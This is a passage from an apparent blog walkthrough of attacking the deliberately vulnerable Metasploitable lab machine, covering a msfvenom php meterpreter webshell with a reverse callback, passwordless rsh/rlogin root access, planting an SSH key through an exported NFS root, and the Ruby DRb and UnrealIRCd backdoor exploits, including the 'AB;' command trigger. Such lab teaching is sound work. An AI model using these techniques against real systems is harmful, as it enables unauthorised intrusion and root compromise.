<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh6SN2DVdBBF6gsrL2Ie6Yh6WanbAxjsOmNBwHgK4d6RExFhYJNm6hdS7hyphenhyphen3mvOkdl9IBuwM2Snn_S3t12WyT0S4w1o07_LJUxpIClQPtQMtYBE6TcS5ukJ85VW7_YoPBSC9dP4xoRbMSA/s1600/26_www_data_to_root_with_creds.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh6SN2DVdBBF6gsrL2Ie6Yh6WanbAxjsOmNBwHgK4d6RExFhYJNm6hdS7hyphenhyphen3mvOkdl9IBuwM2Snn_S3t12WyT0S4w1o07_LJUxpIClQPtQMtYBE6TcS5ukJ85VW7_YoPBSC9dP4xoRbMSA/s320/26_www_data_to_root_with_creds.png" width="320" /></a></div>
<br />
I think the msfadmin creds are cheating a little bit, but for demonstration's sake it serves my point. The kernel is also VERY old so there are many privilege escalation vulnerabilities that would work here...*cough cough* dirty cow *cough cough*.<br />
<br />
We can also do this with metasploit by using msfvenom to create a php payload and having metasploit catch the callback. Let's look at how we can do that.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJzPl06pPUGbzMuILQK89xHe7yeryIDdY4q3Lkf_0LqQlxb0x6QUpzVbmUqSTDjVKHOQWgrec40JvhNzH94Swww3t39GV55MNJCx4DrYeyLs47mE0fNVUbWSCgXlQlhOV2sePI4T38JFWB/s1600/27_setup_multi_handler_metasploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJzPl06pPUGbzMuILQK89xHe7yeryIDdY4q3Lkf_0LqQlxb0x6QUpzVbmUqSTDjVKHOQWgrec40JvhNzH94Swww3t39GV55MNJCx4DrYeyLs47mE0fNVUbWSCgXlQlhOV2sePI4T38JFWB/s320/27_setup_multi_handler_metasploit.png" width="320" /></a></div>
<br />
We set up a multi/handler to catch the meterpreter callback. Then we set it to run as a background job so that no matter when we get the callback, it can catch it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijov3AC_wCRoRgAbpYnimUxxwvtAeD8U_X53HYjyyyM7DUGBpaar3Yx7CX1d_L5eCp4vW3Mi7e5YmTd42ct8pBjH8_DgEjbYkixiZI-uTLhpTNy7LEP7GuTKbW6po5dhpn2txKu9ixzh_v/s1600/28_multi_handler_bg_job.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijov3AC_wCRoRgAbpYnimUxxwvtAeD8U_X53HYjyyyM7DUGBpaar3Yx7CX1d_L5eCp4vW3Mi7e5YmTd42ct8pBjH8_DgEjbYkixiZI-uTLhpTNy7LEP7GuTKbW6po5dhpn2txKu9ixzh_v/s320/28_multi_handler_bg_job.png" width="320" /></a></div>
<br />
Then we needed to create our meterpreter webshell using msfvenom...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwt6nb6HkazEV8Re-eJX39h2DESnW6G0XJaM3-sCyhD1rDJ1JveqYDpRbH3YOnam_wm6gpj2e72QECpcPZDbMJuUNFoEPd5kd84AqLG-IiGQ97-ZtGo__P8tuuDi3xRuND1uwNFplucN-n/s1600/29_create_php_meterpreter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwt6nb6HkazEV8Re-eJX39h2DESnW6G0XJaM3-sCyhD1rDJ1JveqYDpRbH3YOnam_wm6gpj2e72QECpcPZDbMJuUNFoEPd5kd84AqLG-IiGQ97-ZtGo__P8tuuDi3xRuND1uwNFplucN-n/s320/29_create_php_meterpreter.png" width="320" /></a></div>
<br />
There was some issue with using the -f, or format flag, but leaving it off worked just as well and msfvenom figured out I wanted a php script based on the payload. Next, we need to upload and call the script. I decided to show you, you don't need a browser to call the script and execute it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkPj7x43yW-kIuWCYvCkSHjVzlFDOQ-ZSo_5PBixUC34rvLYDbq5-hmPDVpjRcyvUQvFjbZWsvOZUWKKo63m5SCoO4Rkhh2gEAECCgJYKs_2sxD2_9PxTpP3fj6Nw9quUxnapdpF8ziwLs/s1600/30_upload_and_call_reverse_meterpreter_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkPj7x43yW-kIuWCYvCkSHjVzlFDOQ-ZSo_5PBixUC34rvLYDbq5-hmPDVpjRcyvUQvFjbZWsvOZUWKKo63m5SCoO4Rkhh2gEAECCgJYKs_2sxD2_9PxTpP3fj6Nw9quUxnapdpF8ziwLs/s320/30_upload_and_call_reverse_meterpreter_shell.png" width="320" /></a></div>
<br />
That curl script command will not return until after the shell is exited, it is hanging because it is waiting on the response from the php server which is currently providing me with my shell to the target. We can see on the next screenshot that we're running in meterpreter and we can escalate to root.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiZ2YrocUB3xTrMzif4N76oaI2HRFa0TCJmjnWdG3sXwvF7bef_oDlAP0ePBZNKyVMPMpZyjPUTtlDDvATPkTL3IKXQELoPjmoeAHLqg75d8QaI1bNR9c0OjQI7PZDbimVo5JFOWmRtt4r/s1600/31_got_shell_escalate_to_root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiZ2YrocUB3xTrMzif4N76oaI2HRFa0TCJmjnWdG3sXwvF7bef_oDlAP0ePBZNKyVMPMpZyjPUTtlDDvATPkTL3IKXQELoPjmoeAHLqg75d8QaI1bNR9c0OjQI7PZDbimVo5JFOWmRtt4r/s320/31_got_shell_escalate_to_root.png" width="320" /></a></div>
<br />
<br />
Next, we're going to jump over the Samba ports real quick and look at ports 512-514. These are remote shell ports that are open. These work very similarly to telnet or ssh by providing direct access to a shell. In this case, it's direct root access. Before trying to access this backdoor, make sure that the rsh-client package is installed on your operating system. If it is not, the operating system may default to ssh, which is more secure, but is not necessary or wanted from an attacker's perspective because you can login as root with no password based on the current way it's set up.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPocJPwrdo2XvqtF8JTlWpsyy2gqJSdiUq-s844eFPUUR66LceHvYsKV-z0SWaTpM11comSL64gRFc3LN5U89ItAsuSjuC5elwQVOjAR40_2RKizayxXELgJ7csPZq1OaXX6nhX88Y24W3/s1600/32_rsh_straight_to_root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPocJPwrdo2XvqtF8JTlWpsyy2gqJSdiUq-s844eFPUUR66LceHvYsKV-z0SWaTpM11comSL64gRFc3LN5U89ItAsuSjuC5elwQVOjAR40_2RKizayxXELgJ7csPZq1OaXX6nhX88Y24W3/s320/32_rsh_straight_to_root.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRIvyFXcafbQg0qFYnu-no6YMKunvnUqyiuqIjnaw9l7O8nw54K5h5lK6-Oc2HP0oZSiohHSpcHmhAxfkhMb9oicJWYiWzaFatFyZ1vMK-fHS4rNoi67WIDcNHWBA6kPl1j_khv6p4OW9h/s1600/33_rlogin_straight_to_root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRIvyFXcafbQg0qFYnu-no6YMKunvnUqyiuqIjnaw9l7O8nw54K5h5lK6-Oc2HP0oZSiohHSpcHmhAxfkhMb9oicJWYiWzaFatFyZ1vMK-fHS4rNoi67WIDcNHWBA6kPl1j_khv6p4OW9h/s320/33_rlogin_straight_to_root.png" width="320" /></a></div>
<br />
Next, we're going to look at why a world writable network file share is probably not a great idea. We can see from nmap running rpcinfo that nfs is running. Let's see what other information we can find about nfs. First we're going to run showmount -e against the target. This command will show us all the folders the target has 'exported' or in other words, folders we can mount and read/write from/to.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1ZKOHNkJ7vPF9RUJRi30Ey1Et7UlPV9AUa06S4UeiR1eN49LYDS6coMRZZqcvyEPJZopHuhXAaSh0X-Xj_1WBGueDo4T2G9s5OudF9NIr5hWS2f_xfz_meufbn3-6nwjAMPgu6qMNTjPB/s1600/34_showmount_export_root_dir.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1ZKOHNkJ7vPF9RUJRi30Ey1Et7UlPV9AUa06S4UeiR1eN49LYDS6coMRZZqcvyEPJZopHuhXAaSh0X-Xj_1WBGueDo4T2G9s5OudF9NIr5hWS2f_xfz_meufbn3-6nwjAMPgu6qMNTjPB/s320/34_showmount_export_root_dir.png" width="320" /></a></div>
<br />
Yup, you see that right. The root directory is being exported over the network...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Rgce4lG99PCl5rWJkRWuMmbA1UrY2ldVRXiW6rX8U7iBmDSiFjKPK6XvpzJ1xSlKyo7RFQFzbhwza7HczMObVf06iffUyGMItcGFZAWUrz1uWHHbx2N1ckGjlfM6iey6Er4I1Aetk2fv/s1600/35_mounted_nfs_all_directories_shown.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Rgce4lG99PCl5rWJkRWuMmbA1UrY2ldVRXiW6rX8U7iBmDSiFjKPK6XvpzJ1xSlKyo7RFQFzbhwza7HczMObVf06iffUyGMItcGFZAWUrz1uWHHbx2N1ckGjlfM6iey6Er4I1Aetk2fv/s320/35_mounted_nfs_all_directories_shown.png" width="320" /></a></div>
<br />
...and yup, we are able to mount it and access the entire file structure. So we can use this to our advantage by putting our public key in the root .ssh folder. This will allow us to ssh and login without a password because it will recognize us based on our ssh key.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8miJVDDX8qrZxAdjiiREUnLZB2u-VNr3dKpB3wh9v3h5ch3Gw3Tq-SekgJDZRUvTW2AjkjK2q7EYrqJ6Jc0E18CSp55qm7BPTMS7a-mMHLB4j-vEBd52Oi9pzaCPQxmNW2npaY2knTBiu/s1600/36_add_ssh_pubkey_for_ssh_login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8miJVDDX8qrZxAdjiiREUnLZB2u-VNr3dKpB3wh9v3h5ch3Gw3Tq-SekgJDZRUvTW2AjkjK2q7EYrqJ6Jc0E18CSp55qm7BPTMS7a-mMHLB4j-vEBd52Oi9pzaCPQxmNW2npaY2knTBiu/s320/36_add_ssh_pubkey_for_ssh_login.png" width="320" /></a></div>
<br />
Boom, we've appended our public key to the root user's authorized_keys file which will let us log in without a password.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikGvISHPcSOUbvB6Gl477av8H9z6JPjvg0Gi1hCSK28BlNDwdJOoj267_29UmOyADtkAAQRzYS_bt0vz-jpuNq3nCQC_6HONsY-7GEvs3ORObr9j6bXEWJ1KbavcGu8IMfD9VHXIalQzHx/s1600/37_logged_in_with_my_ssh_key.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikGvISHPcSOUbvB6Gl477av8H9z6JPjvg0Gi1hCSK28BlNDwdJOoj267_29UmOyADtkAAQRzYS_bt0vz-jpuNq3nCQC_6HONsY-7GEvs3ORObr9j6bXEWJ1KbavcGu8IMfD9VHXIalQzHx/s320/37_logged_in_with_my_ssh_key.png" width="320" /></a></div>
<br />
There it is! the simple ssh to the target. No users specified, no passwords given, it simply logs us in because the target root user's authorized_keys folder has our public key and we have our private key and we now own the box.<br />
<br />
Now, let's do a metasploit exploit. There are many vulnerable services to choose from, but let's see if there is an exploit for the Ruby RMI Registry.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqfehf87q6bY9VZov5dakb_OYmjSH9YrP0A0QJ8rU3o2kaPnzaTFTukYUmEN-1gcgVzu8vdIzNUIm9QGXarWedRI1O3KVIC62ywVeGNr_NrtUA2mwAHyuCLsxoZoMmTKKMHPAMD7CVK35L/s1600/49_find_ruby_rmi_exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="822" data-original-width="880" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqfehf87q6bY9VZov5dakb_OYmjSH9YrP0A0QJ8rU3o2kaPnzaTFTukYUmEN-1gcgVzu8vdIzNUIm9QGXarWedRI1O3KVIC62ywVeGNr_NrtUA2mwAHyuCLsxoZoMmTKKMHPAMD7CVK35L/s320/49_find_ruby_rmi_exploit.png" width="320" /></a></div>
<br />
There is! We found it in metasploit by searching for 'ruby rmi'. Once we find it, the options are pretty simple and we simply set the correct IP Address.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGluZbPll03QWH5i2P-g_xDtAdp8Ry6__INCcIbYBj7OseDN2dGwgjrBBbBXbKHpI8Y9oSAPrUJyAPxheoZi9v5Sd47iq3zAv2Ka_oNy_KT2qr_jVrKugzVXPZlJJ7gVHb7a1JUOLQGO0p/s1600/50_set_exploit_options.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="822" data-original-width="880" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGluZbPll03QWH5i2P-g_xDtAdp8Ry6__INCcIbYBj7OseDN2dGwgjrBBbBXbKHpI8Y9oSAPrUJyAPxheoZi9v5Sd47iq3zAv2Ka_oNy_KT2qr_jVrKugzVXPZlJJ7gVHb7a1JUOLQGO0p/s320/50_set_exploit_options.png" width="320" /></a></div>
<br />
Now let's run the exploit and see what happens.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGjsdn0D6Fe2IVGt6FScKgk7JLZM-y3qasi0OgERkMsSFc05h7nxA8ggNtYhRdGEMcamdhfb0vS-W51LVWUG8Wf5NWn_gJLoDl0cdtjACVh32H6Z7Q3T67Y6Aj21dy1nNq-07fijbI91wT/s1600/51_exploit_successful.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="822" data-original-width="880" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGjsdn0D6Fe2IVGt6FScKgk7JLZM-y3qasi0OgERkMsSFc05h7nxA8ggNtYhRdGEMcamdhfb0vS-W51LVWUG8Wf5NWn_gJLoDl0cdtjACVh32H6Z7Q3T67Y6Aj21dy1nNq-07fijbI91wT/s320/51_exploit_successful.png" width="320" /></a></div>
<br />
Boom! We got a shell and are root. Now, how did this exploit work? Let's check out the source code for this exploit. We'll work through the source code bit by bit. First...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPQL_3bO2uwiPMCmItfojuD-tS5O-7lAghLUqUx4AlkNXxv67SQzDWWWzqwSI4Fj1I5xJUciRe9phNg2vtgmo3r_q0b-yCcvdsNNzV1T9UG2t0crKHjBKXZ0aQnrc_kk4eZoUw5VDs16ZM/s1600/52_exploit_source_code.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="867" data-original-width="1600" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPQL_3bO2uwiPMCmItfojuD-tS5O-7lAghLUqUx4AlkNXxv67SQzDWWWzqwSI4Fj1I5xJUciRe9phNg2vtgmo3r_q0b-yCcvdsNNzV1T9UG2t0crKHjBKXZ0aQnrc_kk4eZoUw5VDs16ZM/s320/52_exploit_source_code.png" width="320" /></a></div>
<br />
This first chunk of code defines the function 'exploit' and checks for the options we set within metasploit. If the URI option and the RHOST option are both set, we want to print an error because the exploit does not know which option to use. The section immediately below it checks the opposite, if neither are set it prints an error because it doesn't have a target. Let's look at the next section...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp52dzuvh5tCqOyII7IGvhXmlk2pOIEQMtvVZ86Z43cCUGscdzMEIfpxMSW3Vofc1HUpTg9VdyQ2T3ilqhWjXCJ17TYl1D1U5Ms-X4pWiN-_fcWEJUX5MQ5cGxgWjmctPRC-gcAp8f6zI_/s1600/53_exploit_source_code_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="867" data-original-width="1600" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp52dzuvh5tCqOyII7IGvhXmlk2pOIEQMtvVZ86Z43cCUGscdzMEIfpxMSW3Vofc1HUpTg9VdyQ2T3ilqhWjXCJ17TYl1D1U5Ms-X4pWiN-_fcWEJUX5MQ5cGxgWjmctPRC-gcAp8f6zI_/s320/53_exploit_source_code_2.png" width="320" /></a></div>
<br />
Once we have passed the first two sanity checks for the options, if the URI option is NOT blank, we can parse the URI to fill in the RHOST and RPORT options. If it was blank, then we use the specified RHOST and RPORT options to construct the URI.<br />
<br />
All of this work so far has been to build the target from simple host and port options. This is one of the biggest pros to metasploit, it can make anyone a very sophisticated penetration tester or hacker by abstracting away a lot of the technical knowledge. In no way does anyone need to know that it's using the druby:// protocol to use this exploit. All you need to know is that Ruby RMI is running, the host its running on, and the port it's running on and we can instantly get a root shell.<br />
<br />
Moving on to the next part, we start to see the real exploit being built.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAPwOyUePqA3QDxGu8U6AnzRuSpZ83MjlKUOp8lA71d6CCuKay46auezBT9Po6DPx68drRpNUMM4prtrF6lB3_-dSoXZS3IQ4moMPpwF4tWo7_p_-tMdoeeMucJYZagrY2zdGOzntfPpja/s1600/54_exploit_source_code_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1040" data-original-width="1152" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAPwOyUePqA3QDxGu8U6AnzRuSpZ83MjlKUOp8lA71d6CCuKay46auezBT9Po6DPx68drRpNUMM4prtrF6lB3_-dSoXZS3IQ4moMPpwF4tWo7_p_-tMdoeeMucJYZagrY2zdGOzntfPpja/s320/54_exploit_source_code_3.png" width="320" /></a></div>
<br />
Here we instantiate the DRb service and connect to the remote DRb service that is hosted on the metasploitable machine. By itself, this does not seem to be malicious as we're just connecting to a service on a remote system; something we do every time we browse the web. What makes this different is learning more about the DRb service and objects. We can learn all we need to know from this page about the DRb service and objects: <a href="https://ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html">https://ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html</a>.<br />
<br />
This service allows one machine to connect and execute code on the remote machine in the context of a ruby process. Since a ruby process can run a shell, we can use this to get a remote shell and thereby compromise the remote machine.<br />
<br />
In the second block of the above image, you can see the methods variable has three strings in an array. These three strings represent method calls that can be used to achieve remote code execution on the remote machine. In the link above for DRb, you can actually see a version of this exploit under the "Security" header.<br />
<br />
Lastly, the exploit tries each of the methods to execute code on the remote machine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidj3_mQ5KjLNY3Cy1wFpF5rOLD1oAoLnNguXf5cp2jmx_pof1xotWSoRYfzXgSv3YYRoYKczpfRcPJr1f33JcnWkQZHbbMbUuLX7K2cZjURTL_BfpndKLJNLq9po__J6ruO7M_mvstGFM9/s1600/55_exploit_source_code_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1040" data-original-width="1152" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidj3_mQ5KjLNY3Cy1wFpF5rOLD1oAoLnNguXf5cp2jmx_pof1xotWSoRYfzXgSv3YYRoYKczpfRcPJr1f33JcnWkQZHbbMbUuLX7K2cZjURTL_BfpndKLJNLq9po__J6ruO7M_mvstGFM9/s320/55_exploit_source_code_4.png" width="320" /></a></div>
<br />
The `methods.each do |method|` line is like a for loop in ruby that says (basically) for each of the methods in the array 'methods' run the next bit of code. That next bit of code prints the status, sends the method it's trying to use, and runs a handler to facilitate connection between the local and remote machines. If there is an error, it prints a warning and tries the next method. If none of them work, we will see three warning messages that say "The target is not vulnerable to <method name> method" and the process will exit in Metasploit.<br />
<br />
<br />
Next, let's do another metasploit one. We saw in our nmap scan that there was an UnrealIRCd service running and metasploit definitely has a module for this. Let's find it...<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiauPmpIoe389UlEfu0jzx1pRuC2cnm-pvK6SvKWPUMcwDEVP2WskxOXYbcQ7ErVDRQKAxXYMgwg4O7VJ_P0T5dEND4YDxp6STssgYihudI9di4a5OSgutoo0lChmBEafdB7_DNaujcMHdv/s1600/38_unrealirc_backdoor_msfconsole_search.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiauPmpIoe389UlEfu0jzx1pRuC2cnm-pvK6SvKWPUMcwDEVP2WskxOXYbcQ7ErVDRQKAxXYMgwg4O7VJ_P0T5dEND4YDxp6STssgYihudI9di4a5OSgutoo0lChmBEafdB7_DNaujcMHdv/s320/38_unrealirc_backdoor_msfconsole_search.png" width="320" /></a></div>
<br />
There it is! Let's set it up...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifogc-sdcY11cJDlbbLzkeS0U_9vMzo57PuEtpmxWn39vTJyzytvibO_-3Vq0GutbcUrbIp53F69dB9flTALxse7YyyuCmRYUVQpYJl7g0r1xBeQJbi7u3Hd7SsAfn5TroTD_Yjr6H8-sa/s1600/39_show_options_unrealirc_exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifogc-sdcY11cJDlbbLzkeS0U_9vMzo57PuEtpmxWn39vTJyzytvibO_-3Vq0GutbcUrbIp53F69dB9flTALxse7YyyuCmRYUVQpYJl7g0r1xBeQJbi7u3Hd7SsAfn5TroTD_Yjr6H8-sa/s320/39_show_options_unrealirc_exploit.png" width="320" /></a></div>
<br />
<br />
And FIRE!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGoQfqkYB-kk99JEL9wRMRv8BoGiab_G8aKyuXGiuntsgsnKXPfZrX_wWpG1qmtMSzqjnRl-0MDF0CPzx2jx3mb6m9S-Nzk5qChnL3IYQAvIA6zLoeJv12h3AWTiL3Z7o_no7S6W8iKNX/s1600/40_exploit_to_root_unrealircd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGoQfqkYB-kk99JEL9wRMRv8BoGiab_G8aKyuXGiuntsgsnKXPfZrX_wWpG1qmtMSzqjnRl-0MDF0CPzx2jx3mb6m9S-Nzk5qChnL3IYQAvIA6zLoeJv12h3AWTiL3Z7o_no7S6W8iKNX/s320/40_exploit_to_root_unrealircd.png" width="320" /></a></div>
<br />
See how easy that was? Metasploit can make exploitation trivial, but why did that actually work? Well as you might have seen, this was a backdoor placed into the code, much like the first vsftpd service we exploited. The vulnerable versions can be triggered with AB;<system command> so let's try this manually because we should not always rely on metasploit. For our first attempt, we netcat over to the service and try activating the backdoor manually.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgShfaJQIKsF5xHvEb3pP1eca_Pqh4csKDfhqHuPdsUZ-ztR8HvEJdZ-vsMODh3bZyZoaTW08eYpoYBelYys7DkRPpsi_j0LqmmFCy_tKW18rv-gOtaTsc3Vm-EPTPtrfCoXtAMlNwrF-rX/s1600/41_manual_unreal_not_working.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgShfaJQIKsF5xHvEb3pP1eca_Pqh4csKDfhqHuPdsUZ-ztR8HvEJdZ-vsMODh3bZyZoaTW08eYpoYBelYys7DkRPpsi_j0LqmmFCy_tKW18rv-gOtaTsc3Vm-EPTPtrfCoXtAMlNwrF-rX/s320/41_manual_unreal_not_working.png" width="320" /></a></div>
<br />
Nothing is happening. However, we know this vulnerability exists because we just exploited it with metasploit. What's going on? Well after I looked at the source code and didn't find anything else helpful, I realized that maybe it really is working, but we don't see the output. We can test this by having it try and request a webpage from our webserver. As you'll see, this works.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwDi6A-E-Ogd8G4-VccjtYRuQshNO499jjW1SUUmiTB-qnxDf1u_XBXDMEUrgPgqR5zdTCuocDyP0KCsfaCMnt4DHRS3RD_WPWhWE7UQ6ITJnaPVV5kYbJc149hZ9Mw-ddO3NX9qaou8Tw/s1600/42_doesnotexist_html_proof_execution.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwDi6A-E-Ogd8G4-VccjtYRuQshNO499jjW1SUUmiTB-qnxDf1u_XBXDMEUrgPgqR5zdTCuocDyP0KCsfaCMnt4DHRS3RD_WPWhWE7UQ6ITJnaPVV5kYbJc149hZ9Mw-ddO3NX9qaou8Tw/s320/42_doesnotexist_html_proof_execution.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3mFc9O8l0npOQUbZVY2xsMNl3JsfQT7caVQffDunk_8Xq4RvJOyJIeh82uU45OZ2FDfgsFZgbn73AeANLsIQGSrXAnl8bpWxWdFj-MJn-WMiov76b1oZb8shQgkbekwusIGD2psQ8U1n5/s1600/43_see_html_request_proof_code_exec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3mFc9O8l0npOQUbZVY2xsMNl3JsfQT7caVQffDunk_8Xq4RvJOyJIeh82uU45OZ2FDfgsFZgbn73AeANLsIQGSrXAnl8bpWxWdFj-MJn-WMiov76b1oZb8shQgkbekwusIGD2psQ8U1n5/s320/43_see_html_request_proof_code_exec.png" width="320" /></a></div>
<br />
Ahhhh, all is right with the world. Let's use it to quickly get a shell using netcat.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
